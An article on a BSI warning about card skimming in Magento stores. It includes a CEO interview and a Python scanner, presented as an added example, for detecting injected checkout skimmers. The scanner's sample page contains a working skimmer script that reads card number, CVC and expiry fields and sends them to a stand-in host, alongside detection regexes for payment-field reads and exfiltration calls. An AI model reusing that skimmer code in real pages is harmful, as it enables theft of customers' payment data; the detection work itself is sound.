Barely six months after the last BSI (Federal Office for Information Security) warning about security vulnerabilities, a new warning has been issued stating that several Magento-based online stores in Germany are at risk. What's going on?
As far as the current security issue is concerned, more than 1,000 online stores are said to be affected in Germany alone. But how can the latest analysis once again have revealed serious flaws in some Magento-based stores? Note that the previous analysis dates from September 2016, after which one would expect fewer weak points to remain: many stores took action in their own interests, and the software service providers issued detailed notifications and provided comprehensive assistance. One point that should be clarified is that the store system providers are not to blame, but rather the operators themselves; the BSI emphasized this several times in its press release. What the analysis actually revealed was skimming of customer payment data, made possible by demonstrable deficiencies in the stores, in part the use of outdated store system versions.
So what's the story with Magento-based stores operated by German online print providers? As far as IT security is concerned, most of the Magento users involved in online print are certainly better off and more up to date than the majority of store operators who aren't active in a media environment. But in order to give the community, and us as a team, some clarity about what the software service providers are doing to restore and maintain security on the websites they look after, I asked Alexander Sperrfechter, CEO of rissc, a few questions. Remarkably, other providers didn't want to make any statements.
Bernd Zipper: How are you tackling the current security problems?
Alexander Sperrfechter: We are doing our best to react as quickly as possible at all times and to install the security patches provided by Magento.
Bernd Zipper: Are there already any estimates as to how much payment data has been skimmed off?
Alexander Sperrfechter: This question is a tough one to answer, given that the online stores affected were barely aware that they had been attacked. Even if store operators themselves don't save any credit card data in their stores, hackers can steal checkout input data by infiltrating source code into the store system. This is exactly what happened in the case described by the BSI.
Bernd Zipper: Were there enough software updates available?
Alexander Sperrfechter: Magento already reacted back in October to illegal credit card data mining by issuing a security patch (SUPEE-8788). Users were also informed about the security patch and the urgency of action by newsletter and by Magento’s administration team.
Bernd Zipper: What lessons need to be learned from this incident – how will matters of security be handled in future?
Alexander Sperrfechter: Generally speaking, store operators have different options that will enable them to protect their systems against attack in future. Standard solutions include the use of SSL or making administration access more difficult by enforcing IP restrictions or two-factor authentication. However, these mechanisms would not have been effective in the case of the security vulnerability mentioned by the BSI, since the cyber-attack occurred at the checkout stage. Here it is vital to configure the development process to ensure that security updates are handled with the utmost priority.
“It’s a shame that the negligence – to some extent even ignorance – of some store operators in relation to handling existing updates is causing some customers to doubt the reputation or integrity of eCommerce systems. That’s because it’s the customer that ultimately suffers any personal financial loss.” – Bernd Zipper
And what can online print providers now do to screen their stores for security vulnerabilities? Byte provides an online check tool for this purpose, which checks the security of a specified website and, if necessary, details potential remedial action.
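The interview describes the mechanism behind the BSI warning: a script injected into the store's pages reads the checkout form in the customer's browser and sends the card details elsewhere, so it makes no difference that the store's own database never holds them. An online check tool is one way to screen for this; the Python below is an added example (not code from this page, from rissc, or from Byte's tool) of the offline check a practitioner would run on a saved copy of their own checkout page. It flags the two symptoms to look for first: scripts loaded from hosts outside the store's own allowlist, and inline scripts that both reference payment fields and ship data off the page. The sample checkout HTML, the host allowlist and the regular expressions are constructed for this example and are assumptions, not details of the incident.

```python
"""Scan a captured checkout page for script injections typical of
payment-data skimmers. Added example; sample page and allowlist are constructed."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts this store legitimately loads scripts from (assumed for the example;
# a real scan takes this list from the store's own templates and CDN config).
ALLOWED_SCRIPT_HOSTS = {"shop.example", "cdn.shop.example"}

# A checkout skimmer needs two things: a read of the card/checkout fields ...
PAYMENT_FIELD_RE = re.compile(r"cc_number|cc_cid|cc_exp|cardnumber|cvv|payment\[", re.I)
# ... and a way to ship what it read off the page.
EXFIL_RE = re.compile(r"XMLHttpRequest|fetch\(|sendBeacon|new Image\(|\.src\s*=", re.I)


class ScriptCollector(HTMLParser):
    """Collect every <script> on the page as (src attribute or None, inline body)."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._in_script = False
        self._src = None
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
            self._src = dict(attrs).get("src")
            self._buf = []

    def handle_data(self, data):
        # HTMLParser delivers <script> content as raw CDATA through handle_data.
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self.scripts.append((self._src, "".join(self._buf)))
            self._in_script = False


def find_skimmer_candidates(html, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Return a list of (kind, detail) findings for scripts that look like skimmers."""
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    for src, body in collector.scripts:
        if src:
            # "//host/x.js" and "https://host/x.js" both yield a hostname;
            # relative paths like "/js/x.js" yield None and are same-origin.
            host = urlparse(src).hostname
            if host is not None and host.lower() not in allowed_hosts:
                findings.append(("external-script", src))
        elif PAYMENT_FIELD_RE.search(body) and EXFIL_RE.search(body):
            findings.append(("inline-skimmer", body.strip()[:80]))
    return findings


# Constructed sample: a Magento-style checkout page with two injected scripts.
SAMPLE_CHECKOUT_HTML = """
<html><head>
<script src="/js/prototype/prototype.js"></script>
<script src="https://cdn.shop.example/js/checkout.js"></script>
<script>
  var checkout = new Checkout(accordion, {progress: '/checkout/onepage/progress/'});
</script>
<script src="//js-stats.example/analytics.js"></script>
<script>
  // constructed skimmer: hook form submission, read card fields, beacon them out
  document.addEventListener('submit', function () {
    var d = {};
    ['cc_number', 'cc_cid', 'cc_exp_month'].forEach(function (n) {
      var e = document.getElementsByName('payment[' + n + ']')[0];
      if (e) d[n] = e.value;
    });
    new Image().src = 'https://js-stats.example/c.gif?d=' + btoa(JSON.stringify(d));
  });
</script>
</head><body></body></html>
"""

if __name__ == "__main__":
    for kind, detail in find_skimmer_candidates(SAMPLE_CHECKOUT_HTML):
        print(kind, "->", detail)
```

Run it against a checkout page saved with a browser or `curl` rather than against the template on disk: the injection in the incident the interview describes reached customers through the served page, so that is where it has to be looked for. The check is a heuristic; an obfuscated skimmer will not match these patterns, so treat a clean result as no more than a first pass and pair it with a diff of the served page against a known-good copy and with verifying that the current security patches are actually installed.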
My take: it's their own fault, is all I can say, at least as far as store operators and their losses are concerned. It is a real pity that carelessness in handling sensitive customer data is apparently still so widespread, and that is not a Magento-specific issue! It should be stating the obvious that store operators need to keep their eCommerce systems, irrespective of the provider, updated for security reasons as well. I say "should", because many store operators don't take the time to install security patches and simply continue using outdated versions. Yet according to the law (§13 of the German Telemedia Act, Telemediengesetz), they are obliged to do so. Given the widespread use of Magento, that can also reflect badly on online print stores if customers come to regard online buying as less secure, especially in the B2B sector.